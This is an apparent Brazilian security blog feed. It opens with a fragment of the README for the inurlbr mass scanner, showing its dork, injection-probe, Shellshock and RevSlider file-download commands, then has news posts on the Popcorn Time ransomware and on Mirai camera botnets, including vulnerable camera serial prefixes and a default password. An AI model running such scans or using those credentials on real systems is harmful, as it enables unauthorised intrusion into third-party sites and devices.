<br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr<br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock<br /><br /><br /><br /><br /><br /><br /><br /><br />./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt' <br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br />- Installation<br /><br /><br /><br />----<br /><br /><br /><br />Preferably, you can download inurlbr by cloning the [Git](https://github.com/googleinurl/SCANNER-INURLBR) repository:<br /><br /><br /><br />```<br /><br /><br /><br /> git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr<br /><br /><br /><br />```<br /><br /><br /><br />The inurlbr works with [php](http://php.net/downloads.php) version **5.4.x** linux platforms.<br /><br /><br /><br /><br /> <br /><br /><br /><br />- Giving permission to script execution:<br /><br /><br /><br />------<br /><br /><br /><br />```<br /><br /><br /><br />$chmod +x inurlbr.php<br /><br /><br /><br />Executar: ./inurlbr.php<br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br />- Usage<br /><br /><br /><br />----<br /><br /><br /><br /><br /> <br /><br /><br /><br />To get a list of basic options and switches use:<br /><br /><br /><br />```<br /><br /><br /><br /> php inurlbr.php -h<br /><br /><br /><br />```<br /><br /><br /><br />To get a list of all options and switches use:<br /><br /><br /><br />```<br /><br /><br /><br /> python inurlbr.php --help<br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br />* Demos: [http://youtube.com/c/INURLBrasil](https://www.youtube.com/playlist?list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR)<br /><br /><br /><br />* Tutoriais: [http://blog.inurl.com.br/search/label/INURLBR](http://blog.inurl.com.br/search/label/INURLBR)<br /><br /><br /><br /><br /><br /><br />* IRC: irc.rizon.net / #inurlbrasil</span>mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-22433101853748273862016-12-12T13:35:00.000-02:002016-12-12T13:35:55.135-02:00Novo ransomware obriga utilizadores a infetar outras pessoas para salvar seus arquivos<div>
<br /></div>
<div>
<h2 class="lead" style="border: 0px; box-sizing: inherit; clear: none; color: #9a9a9a; font-family: Roboto, sans-serif; font-size: 20px; font-stretch: normal; font-weight: 400; line-height: 1.4em; margin: 12px 0px 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
O malware chama-se Popcorn Time e obriga os utilizadores a pagar um resgate de 733 euros ou, em alternativa, a infetar outras duas pessoas.</h2>
</div>
<div>
<br /></div>
<img src="http://images-cdn.impresa.pt/exameinformatica/2016-12-12-Ransomware.jpg/original/mw-860" /><div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="border: 0px; box-sizing: inherit; font-family: Roboto, sans-serif; font-size: 18px; margin-bottom: 1.7em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
A<a href="https://twitter.com/malwrhunterteam/status/806595092177965058" style="-webkit-box-decoration-break: clone; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-bottom-color: rgb(191, 234, 251); border-bottom-style: solid; border-image: initial; border-left-color: initial; border-left-style: initial; border-right-color: initial; border-right-style: initial; border-top-color: initial; border-top-style: initial; border-width: 0px 0px 4px; box-shadow: rgb(191, 234, 251) 0px -3px 0px inset; box-sizing: inherit; color: black; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; position: relative; text-decoration: none; transition: background 0.15s cubic-bezier(0.33, 0.66, 0.66, 1); vertical-align: baseline;" target="_blank">MalwareHunterTeam </a>descobriu um novo tipo de ransomware que vai além do habitual pagamento pelo resgate dos dados. O malware chama-se Popcorn Time e recorre a encriptação AES-256 para bloquear os ficheiros do utilizador, exigindo em troca o pagamento de um resgate de uma bitcoin – um valor equivalente a 774 dólares, ou seja, cerca de 733 euros.</div>
<div style="border: 0px; box-sizing: inherit; font-family: Roboto, sans-serif; font-size: 18px; margin-bottom: 1.7em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Este é o comportamento habitual do ransomware, mas o Popcorn Time acrescenta-lhe uma alternativa: o utilizador terá de enviar um link com o malware para outras duas pessoas; se elas forem infetadas e pagarem, então a vítima original recebe a chave de desencriptação de forma gratuita.</div>
<div style="border: 0px; box-sizing: inherit; font-family: Roboto, sans-serif; font-size: 18px; margin-bottom: 1.7em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Os utilizadores infetados têm sete dias para pagar o resgate e a <a href="http://www.zdnet.com/article/new-ransomware-decrypts-your-files-if-you-infect-your-friends/" style="-webkit-box-decoration-break: clone; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-bottom-color: rgb(191, 234, 251); border-bottom-style: solid; border-image: initial; border-left-color: initial; border-left-style: initial; border-right-color: initial; border-right-style: initial; border-top-color: initial; border-top-style: initial; border-width: 0px 0px 4px; box-shadow: rgb(191, 234, 251) 0px -3px 0px inset; box-sizing: inherit; color: black; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; position: relative; text-decoration: none; transition: background 0.15s cubic-bezier(0.33, 0.66, 0.66, 1); vertical-align: baseline;" target="_blank"><em style="border: 0px; box-sizing: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">ZDNet</em> </a>refere que, se as vítimas inserirem a chave de desencriptação demasiadas vezes, o ransomware irá bloquear permanentemente os ficheiros. A última versão do malware é capaz de encriptar ficheiros nas pastas Documentos, Imagens, Música e Ambiente de Trabalho, além de dezenas de extensões de ficheiros.</div>
<div style="border: 0px; box-sizing: inherit; font-family: Roboto, sans-serif; font-size: 18px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
A informação avançada pelos próprios cibercriminosos (e que carece de confirmação oficial) é de que se trata de um grupo sírio que pretende usar o dinheiro para «comida, medicamentos e abrigos para os necessitados». «Lamentamos muito estar a forçá-lo a pagar, mas é a única forma de sobrevivermos», refere a nota do Popcorn Time.</div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-11831780283733181082016-12-11T22:09:00.001-02:002016-12-11T22:11:00.210-02:00Câmeras Wi-Fi<br />
<header class="article-header" style="background-color: white; border: 0px; box-sizing: border-box; font-family: Roboto, sans-serif; list-style: none; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; width: 750px;"><h1 class="article-title" style="border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.901961); font-family: Lato; font-size: 46px; font-weight: 400; letter-spacing: -1px; line-height: 1; list-style: none; margin: 0px 0px 15px; outline: 0px; padding: 0px;">
<div class="separator" style="clear: both; text-align: center;">
</div>
</h1>
</header><section class="article-content" style="background-color: white; border: 0px; box-sizing: border-box; float: none; list-style: none; margin: 0px 0px 40px; outline: 0px; padding: 0px 0px 0px 70px; width: auto;"><div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Essa ameaça à internet como a conhecemos hoje é um tipo de ataque hacker que não requer qualquer tipo de invasão muito sofisticada, nem a instalação de um software malicioso em um servidor ou a intervenção de um internauta leigo em tecnologia da informação. “DDoS” é uma sigla em inglês que abrevia “negação de serviço”. Em termos simples, ele causa uma sobrecarga em servidores responsáveis por um ou mais sites usando aparelhos conectados à internet.</span><br />
<span style="border: 0px; box-sizing: border-box; clear: left; float: left; list-style: none; margin-bottom: 1em; margin-right: 1em; margin-top: 0px; outline: 0px; padding: 0px;"><img alt="Resultado de imagem para cameras wifi" src="http://i.ebayimg.com/00/s/MzAxWDMwMA==/z/O7UAAOSwDN1UNb90/$_35.JPG?set_id=2" /></span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Em grande parte dos casos, o problema que viabiliza o DDoS é ocasionado pelas fabricantes de hardware (e pelos consumidores) ou pelos técnicos que promovem instalações desses dispositivos conectados à web.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Em 21 de outubro, uma série de ataques desse tipo praticamente quebrou a internet. O alvo era a Dyn, fornecedora de serviços de DNS para diversos sites, como Netflix, PayPal, Twitter, SoundCloud e Spotify. Até o jornal The New York Times e o site da revista Wired saíram do ar. Os servidores afetados no ataque estavam localizados nos Estados Unidos, mas a repercussão do caso atingiu nível global. Internautas de todo o mundo ficaram sem acesso a alguns sites por conta dessa série de ataques DDoS. O <a href="http://gizmodo.com/this-is-probably-why-half-the-internet-shut-down-today-1788062835" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank"><em style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Gizmodo</em></a> tem uma lista dos sites que foram prejudicados nessa data.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">A razão dos ataques não foi abertamente divulgada pela Dyn ou por qualquer grupo de hackers conhecido, mas o pesquisador de segurança Brian Krebs afirma em seu <a href="https://krebsonsecurity.com/2016/10/ddos-on-dyn-impacts-twitter-spotify-reddit/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">blog</a> que os hackers responsáveis pelos ataques pediram resgate no valor de 5 bitcoins, com multa diária no mesmo valor caso o pedido não fosse atendido. Vale notar que a Oracle <a href="https://www.oracle.com/corporate/pressrelease/oracle-buys-dyn-112116.html" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">comprou</a> a Dyn logo após os ataques. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Também em 2016, mais precisamente em 30 de setembro, outro ataque semelhante aconteceu e ele foi um dos maiores da história. As botnets são redes de computadores zumbis, na gíria do ramo. Basicamente, um malware se instala em uma série de PCs e eles participam de algum tipo de ataque hacker sem que os donos desses eletrônicos autorizem ou sequer saibam que eles estão ocorrendo. Esse tipo de ameaça já é antiga no meio dos PCs, mas agora ela também está em evidência nas câmeras conectadas, bem como em roteadores.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Exemplo disso é o ataque contra a OVH. <a href="http://arstechnica.com/security/2016/09/botnet-of-145k-cameras-reportedly-deliver-internets-biggest-ddos-ever/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">Mais de 145 mil câmeras com Wi-Fi foram usadas para promover um ataque de DDoS</a> à empresa de serviços de computação em nuvem. A velocidade do envio de dados aos servidores da companhia foi de 1,1 terabits por segundo. Um segundo ataque teve velocidade de 901 Gbps. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Outro ataque, de menor porte, <a href="https://blog.sucuri.net/2016/06/large-cctv-botnet-leveraged-ddos-attacks.html" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">foi promovido neste ano usando uma botnet</a> (rede zumbi) de 25 mil câmeras conectadas. No pico do ataque, foram gerados mais de 50 mil solicitações HTTP, ocasionando sobrecarga de servidores. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Durante a <a href="https://www.arbornetworks.com/blog/asert/rio-olympics-take-gold-540gbsec-sustained-ddos-attacks/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">Olimpíada Rio-2016, os sites oficiais do evento esportivo foram alvos de ataques DDoS</a>, que tiveram picos de 540 Gbps. Segundo a empresa de proteção contra DDoS Arbor Networks, dispositivos de internet das coisas foram usados para gerar esse poder de ataque. Porém, os sites permaneceram online porque os organizadores da Olimpíada prepararam as páginas para suportar esse tipo de investida maliciosa. </span></div>
<h3 style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.901961); font-family: Roboto, sans-serif; font-size: 22px; line-height: 22px; list-style: none; margin: 0px 0px 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<b style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Mira na sua câmera</b></h3>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Um dos malwares que infecta os dispositivos de internet das coisas é chamado Mirai. Ele</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"> já infectou mais de 493 mil dispositivos conectados desde a liberação de seu código fonte na web, <a href="http://blog.level3.com/security/grinch-stole-iot/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">de acordo com a divisão de segurança virtual da provedora de internet Level 3</a>. Segundo dados divulgados em outubro deste ano, mais de 113 mil desses aparelhos eram do Brasil. O malware tem foco em gravadores de vídeo (DVRs), usados para receber imagens de câmeras com Wi-Fi. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Segundo Antonio Augusto Medeiros Fröhlich, membro sênior do IEEE (Instituto de Engenheiros Eletricistas e Eletrônicos) e professor da Universidade Federal de Santa Catarina, se algo não mudar nos próximos anos, a frequência e intensidade dos ataques DDoS pelo mundo vai aumentar. “As câmeras de vigilância e roteadores estão sempre ligados. Por isso, a disponibilidade para ataques é grande e esses aparelhos têm normalmente conexões de internet banda larga”, afirmou Fröhlich, em entrevista a EXAME.com.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">“A fabricante da primeira geração de dispositivos de Internet das Coisas oferece um manual de configuração que pede ao usuário que troque sua senha manualmente. Porém, muitas vezes é um técnico que coloca o equipamento na casa das pessoas. Se ele trocar, a senha, uma nova visita técnica precisa ser agendada. A conveniência evita a visita e facilita a manutenção. Manter a senha padrão é uma conveniência para a empresa e para o usuário nesse ponto, mas ela representa um grande risco”, declarou o professor. </span></div>
<h3 style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.901961); font-family: Roboto, sans-serif; font-size: 22px; line-height: 22px; list-style: none; margin: 0px 0px 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<b style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Big Brother involuntário</b></h3>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Esse problema das câmeras com senhas padrão não é exatamente novidade. Conforme reportado pela Kaspersky, no início deste ano, <a href="https://blog.kaspersky.com/2ch-webcam-hack/11961/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">hackers colocaram no YouTube vídeos ao vivo de câmeras que foram invadidas</a>. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Há também alguns sites que transmitem sinais de câmeras IP em tempo real, como o <a href="https://www.shodan.io/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">Shodan</a> e o <a href="http://www.insecam.org/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">Insecam</a>. Você pode ver de tudo lá, como plantações de maconha ou jaulas de coelhos. Esses sites tentam alertar sobre a importância de ter senhas minimamente fortes para proteger câmeras conectadas – apesar de ser também locais de deleite para voyeurs.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<b style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">DDoS massivo</b></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">A quantidade de dispositivos conectados à internet só tende a aumentar. De acordo com um <a href="http://exame.abril.com.br/tecnologia/50-bi-de-dispositivos-estarao-conectados-a-internet-ate-2020/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">estudo</a> da Cisco, serão 50 bilhões de aparelhos ligados à web em 2020. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">No relatório de previsões Roundup 2017, a empresa de segurança digital Trend Micro indica que os dispositivos de Internet das Coisas terão papel de destaque nos ataques massivos de DDoS que serão promovidos por hackers no ano que vem. Webcams, roteadores, sistemas de transporte público, ar-condicionado, aquecedores domésticos e carros conectados à internet são dispositivos que sofreram ataques remotos de cibercriminosos no ano de 2016. E mais estão por vir.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Com isso, o descuido com a segurança desses gadgets põe em risco a disponibilidade de informações e de serviços na internet, de acordo com Nelson Barbosa, engenheiro de segurança da Norton. “Isso é um prato cheio para quem é mal intencionado para promover um ataque. Infelizmente, dado o cenário de segurança que temos hoje, o bom paga pelo mau”, disse Barbosa, em entrevista a EXAME.com.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">O engenheiro afirma também que os usuários de dispositivos conectados à internet precisam tomar algumas medidas básicas de segurança para evitar problemas. “Temos que nos proteger das pessoas que querem nos causar algum tipo de de mal. Mudar essa cultura preventiva é um trabalho de formiguinha. Temos que plantar, aos poucos, a consciência da proteção digital nas cabeças das pessoas”, declarou Barbosa.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Luiz Cesar de Oliveira, vice-presidente da Viavi Solutions para América Latina e Caribe, lembra que, além de ter segurança nos dispositivos, medidas podem ser tomadas nas redes, especialmente no caso de empresas, que têm equipes de TI dedicadas a evitar ataques hackers. “É um desafio implementar padrões de segurança. Se não conseguirmos isso na ponta, no dispositivo, é na rede que será preciso tomar alguma medida de segurança”, declarou Oliveira.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<b style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Jogue a sua câmera no lixo</b></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Pesquisadores da empresa de segurança CyberReason <a href="https://www.cybereason.com/zero-day-exploits-turn-hundreds-of-thousands-of-ip-cameras-into-iot-botnet-slaves/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">descobriram</a> falhas em câmeras conectadas que ainda não têm soluções por parte das fabricantes. Essas brechas permitem que um hacker assuma total controle da sua câmera, ou seja, ele poderá ver e ouvir tudo que acontece no ambiente em tempo real ou mesmo utilizar o dispositivo para promover um ataque DDoS.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Os modelos afetados por essas falhas ou têm senhas padrão 888888 ou têm números de série que começam com os seguintes códigos:</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px;">
</div>
<div style="text-align: justify;">
– MEYE</div>
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– MCI</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– VST*</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– XXC</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– 005*</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– J MTE</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– WEV</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– PIPCAM</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– SURE</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– NIP</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– EST</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– VIEW</div>
</span><span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><div style="text-align: justify;">
– PSD</div>
</span><br />
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
